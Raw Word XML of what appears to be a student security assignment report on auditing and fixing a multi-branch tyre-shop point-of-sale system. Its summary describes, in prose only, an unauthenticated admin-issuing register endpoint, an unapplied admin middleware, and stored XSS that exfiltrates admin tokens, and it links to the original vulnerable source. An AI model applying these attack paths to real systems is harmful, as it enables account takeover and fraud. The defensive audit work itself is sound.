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6" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:jc w:val="center"/>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Securing a Multi-Branch Point-of-Sale System</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
        <w:ind w:left="24" w:hanging="1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SE4030 - Secure Software Development</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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Assignment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="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Application:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pubudu Tyres POS / mini-ERP - Laravel 10 REST API + React 19 SPA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="10194.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="38.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0400"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2998"/>
        <w:gridCol w:w="1335"/>
        <w:gridCol w:w="5861"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2998"/>
            <w:gridCol w:w="1335"/>
            <w:gridCol w:w="5861"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="1"/>
          <w:trHeight w:val="435" w:hRule="atLeast"/>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6">
            <w:pPr>
              <w:spacing w:after="4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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Member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7">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IT number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8">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="1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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Workstream</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="1"/>
          <w:trHeight w:val="446" w:hRule="atLeast"/>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9">
            <w:pPr>
              <w:spacing w:after="40" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">P.A.R.B. Subasingha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A">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4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IT22098450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B">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="1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Access control, session management, OAuth/OIDC</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="1"/>
          <w:trHeight w:val="624" w:hRule="atLeast"/>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C">
            <w:pPr>
              <w:spacing w:after="40" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">R.M.K.N. Gunasena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D">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4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IT22078582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E">
            <w:pPr>
              <w:spacing w:after="4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Frontend attack surface and API response confidentiality</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="1"/>
          <w:trHeight w:val="439" w:hRule="atLeast"/>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0F">
            <w:pPr>
              <w:spacing w:after="40" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">R.H.F. Hamna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10">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4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IT22516916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11">
            <w:pPr>
              <w:spacing w:after="4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Configuration, transport, dependencies, test suite, CI</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="1"/>
          <w:trHeight w:val="435" w:hRule="atLeast"/>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12">
            <w:pPr>
              <w:spacing w:after="40" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">R.M.M.P. Bandara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13">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4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IT22249166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014">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="1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Input/business-logic integrity, auditability, frontend invoice request boundary</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
        <w:ind w:left="24" w:hanging="1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 Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">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took a production point-of-sale system that our team had previously built for a multi-branch tyre and auto-parts business, audited it, and fixed it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">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audit found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">19 distinct vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We fixed 14 and documented 5 as deliberately deferred with reasons. We also implemented Google OpenID Connect sign-in using the Authorization Code flow with PKCE, applied to the staff login feature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">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Three findings stand out, because each one alone was sufficient to compromise the entire system:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">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An unauthenticated endpoint that issued administrator credentials.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1A">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POST /api/register sat outside every middleware group and accepted the caller's own choice of role . </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">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One anonymous HTTP request returned a working admin bearer token. Every other access control in the application was downstream of this one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">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An authorization layer that was built and never installed.</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1D">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application contained a correct AdminMiddleware , correctly registered.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">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It was applied to exactly zero routes. Being signed in as any cashier was sufficient to cancel invoices, rewrite stock quantities, reprice goods, zero a customer's debt and read every profit report.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">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Stored cross-site scripting that stole administrator sessions.</w:t>
      </w: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20">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The thermal-receipt printer built HTML by string concatenation with no escaping anywhere in the codebase and the one function that looked like a sanitiser had had its.replace() deleted, so it returned its input unchanged. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">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cashier could save a customer name containing a script payload;it fired when an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> later printed that invoice, exfiltrating the admin's token from localStorage a token which, because of a separate finding, never expired.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">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measurable outcome:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="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after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="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after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="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after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="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160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="10194.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="38.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0400"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3448"/>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="2333"/>
        <w:gridCol w:w="3310"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3448"/>
            <w:gridCol w:w="1103"/>
            <w:gridCol w:w="2333"/>
            <w:gridCol w:w="3310"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>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8">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="00000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9">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="113" w:firstLine="0"/>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        Before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A">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>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B">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="11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After</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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C">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="11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Attack scripts that succeed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D">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="00000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E">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 / 12 core suite + V-20 reproduced separately</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F">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0 / 14</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="11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Composer advisories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1">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="00000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2">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:righ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41</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3">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0</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="11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npm advisories (2 critical, 14 high)</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5">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="00000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6">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:righ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23</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7">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0</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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8">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="11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Automated security tests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9">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="00000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A">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:righ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B">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="551"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90</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> (230 assertions)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="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All findings were confirmed by executing the attack, not by reading code. Every fix is verified by a runnable script and by a regression test that fails against the original and passes against the fixed version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
        <w:ind w:left="24" w:hanging="1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 The application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point-of-sale and inventory system for a tyre shop with multiple branches, in production use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">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Backend</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Laravel 10.50 / PHP 8.1, Sanctum bearer tokens, MySQL. 14 API controllers, ~102 routes. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">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Frontend</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - React 19, Vite, Tailwind, axios. 24 pages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">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Domain features:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> invoicing with cash and credit sales, FIFO batch stock allocation, a customer credit ledger, goodsreceived notes with adjustment history, a discount-request approval workflow (cashier requests → administrator approves), multi-branch separation by "department", staff management, and sales/profit reporting.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">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Why this application qualifies? </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is our own prior work, not a teaching application. It is not WebGoat, DVWA or any deliberately vulnerable target, and the hardened version was not publicly available before this assignment. It has genuine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scope:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> real money, real customer PII, multi-tenancy, a role model and an approval workflow is enough structure for authorization flaws to be meaningful rather than academic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">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Baseline:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The unmodified code is tagged v0-original-vulnerable in both new repositories. Backend last original commit d997cbc (18 May 2026); frontend 52b7707 (27 May 2026).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">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Repositories: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Assignment submission (hardened code + evidence) </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="0563c1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">github.com/Ravindu200232/SSD_Assigment</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Original pre-hardening source, backend </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="0563c1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">github.com/Chathura876/pubudu-pos-api</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and frontend </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="0563c1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">github.com/Chathura876/pubudu-pos-front-end</w:t>
        </w:r>
      </w:hyperlink>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47">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
